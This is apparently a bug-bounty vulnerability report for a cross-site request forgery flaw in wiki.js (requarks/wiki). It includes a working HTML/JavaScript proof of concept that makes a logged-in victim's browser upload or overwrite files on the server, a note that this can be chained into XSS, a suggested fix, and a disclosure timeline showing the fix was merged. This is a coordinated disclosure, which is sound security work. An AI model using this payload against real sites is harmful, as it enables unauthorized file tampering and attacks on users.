Cross-Site Request Forgery (CSRF) in requarks/wiki

Valid

Reported on

Jan 20th 2022


Description

CSRF to upload and overwrite files

Proof of Concept

Open this HTML as a logged-in user

<html>
  <body>
    <script>
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http://127.0.0.1:3000/u", true);
        xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "de-de,de;q=0.8,en-us;q=0.5,en;q=0.3");
        xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------256672629917035");
        xhr.withCredentials = "true";
        var body = "-----------------------------256672629917035\r\n" +
          "Content-Disposition: form-data; name=\"mediaUpload\"\r\n" +
          "\r\n" + "{\"folderId\":0}" +
          "\r\n" +
          "-----------------------------256672629917035\r\n" +
          "Content-Disposition: form-data; name=\"mediaUpload\"; ; filename=\"pwned.txt\"\r\n" + 
          "Content-Type: text/plain\r\n" +
          "\r\n" +
          "[DATA-HERE]" + "\r\n" +
          "-----------------------------256672629917035--\r\n"
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i);
        xhr.send(new Blob([aBody]));
    </script>
  </body>
</html>

A file named pwned.txt should be uploaded.

If a file named pwned.txt was already on the server then it will be overwritten.

Impact

When a logged-in victim visits a website hosting the malicious HTML, they will unknowingly upload / overwrite files to the wiki.js server, this can be chained to perform unauthenticated XSS via previous vulnerabilities in wiki.js < 2.5.264 by tricking the victim to upload a malicious SVG / XML file via the CSRF vulnerability and then redirecting them to the malicious file.

Recommened Fix

Use the Authorization header to authorize a file upload rather than a cookie upload as the Authorization header will not be sent by the browser in cross-origin requests

We are processing your report and will contact the requarks/wiki team within 24 hours. 4 months ago
haxatron modified the report
4 months ago
haxatron modified the report
4 months ago
haxatron modified the report
4 months ago
haxatron modified the report
4 months ago
haxatron modified the report
4 months ago
We have contacted a member of the requarks/wiki team and are waiting to hear back 4 months ago
haxatron modified the report
4 months ago
Nicolas Giard validated this vulnerability 4 months ago
haxatron has been awarded the disclosure bounty
The fix bounty is now up for grabs
Nicolas Giard confirmed that a fix has been merged on a04f7b 4 months ago
Nicolas Giard has been awarded the fix bounty
upload.js#L13L107 has been validated
to join this conversation